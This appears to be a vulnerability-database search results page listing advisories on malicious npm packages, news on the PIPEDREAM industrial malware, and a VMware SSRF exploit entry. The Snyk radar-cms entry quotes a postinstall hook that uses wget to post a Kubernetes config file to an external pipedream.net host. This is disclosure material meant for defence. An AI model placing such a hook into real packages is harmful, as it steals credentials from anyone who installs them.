Lucene search
K

10 matches found

OSV
OSV
added 6 days ago4 views

MAL-2026-6467 Malicious code in @vpms/design-system (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 43ce5813fba2660b094a3e8a5c5a0bf2f1972530c294830c0a2e3d15dcd1b096 package.json declares preinstall="node index.js". On every npm install, index.js iterates process.env and harvests any variable whose name contains...

5.8AI score
Exploits0References5
OSV
OSV
added 2026/06/13 2:10 a.m.11 views

MAL-2026-5723 Malicious code in @ci-lifecycle-test/postinstall-ping (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 75c160ad40a237c1e682c696ebd0aec2861ca072f47bd5b725bc80f7f95ed509 The package's postinstall lifecycle script postinstall.js executes automatically on npm install and POSTs the JSON-serialized contents of the entire...

5.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2024/12/13 4:51 p.m.3 views

Malicious code in pipedream-curl (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis c8b5e047b6a8fdba2b0c3473a51edbdb9b488f22377ca3a66bb206193e7da7e5 The OpenSSF Package Analysis project identified 'pipedream-curl' @ 1.0.1 npm as malicious. It is considered malicious because: - The package...

6.9AI score
Exploits0
OSV
OSV
added 2024/12/13 4:51 p.m.12 views

MAL-2024-11821 Malicious code in pipedream-curl (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis c8b5e047b6a8fdba2b0c3473a51edbdb9b488f22377ca3a66bb206193e7da7e5 The OpenSSF Package Analysis project identified 'pipedream-curl' @ 1.0.1 npm as malicious. It is considered malicious because: - The package...

7.1AI score
Exploits0
Schneier on Security
Schneier on Security
added 2023/05/09 3:20 p.m.21 views

PIPEDREAM Malware against Industrial Control Systems

Another nation-state malware, Russian in origin: In the early stages of the war in Ukraine in 2022, PIPEDREAM, a known malware was quietly on the brink of wiping out a handful of critical U.S. electric and liquid natural gas sites. PIPEDREAM is an attack toolkit with unmatched and unprecedented...

7AI score
Exploits0
The Hacker News
The Hacker News
added 2022/05/09 8:55 a.m.42 views

Ukrainian CERT Warns Citizens of a New Wave of Attacks Distributing Jester Malware

The Computer Emergency Response Team of Ukraine CERT-UA has warned of phishing attacks that deploy an information-stealing malware called Jester Stealer on compromised systems. The mass email campaign carries the subject line "chemical attack" and contains a link to a macro-laced Microsoft Excel...

0.5AI score
Exploits0
Schneier on Security
Schneier on Security
added 2022/04/14 3:46 p.m.15 views

Industrial Control System Malware Discovered

The Department of Energy, CISA, the FBI, and the NSA jointly issued an advisory describing a sophisticated piece of malware called Pipedream thats designed to attack a wide range of industrial control systems. This is clearly from a government, but no attribution is given. Theres also no indicati...

2.4AI score
Exploits0
Wired Threat Level
Wired Threat Level
added 2022/04/13 7:50 p.m.9 views

Feds Uncover a ‘Swiss Army Knife’ for Hacking Industrial Systems

The malware toolkit, known as Pipedream, is perhaps the most versatile tool ever made to target critical infrastructure like power grids and oil refineries...

3.1AI score
Exploits0
GithubExploit
GithubExploit
added 2021/03/31 1:33 p.m.62 views

Exploit for Server-Side Request Forgery in Vmware Cloud_Foundation

CVE-2021-21975 SSRF-POC - ssrf to cred leak First configur...

7.5CVSS7.8AI score0.78435EPSS
Exploits10
Snyk
Snyk
added 2021/03/04 5:52 p.m.4 views

Malicious Package

Overview radar-cms is a malicious package. The package was found to have a post-install command which when executed will exfiltrate multiple files from a host machine. PoC "postinstall": "wget --post-file /.kube/config https://entfet95itcxpuu.m.pipedream.net;wget --post-file package.json...

9.6CVSS6.9AI score
Exploits0References2
Rows per page
Query Builder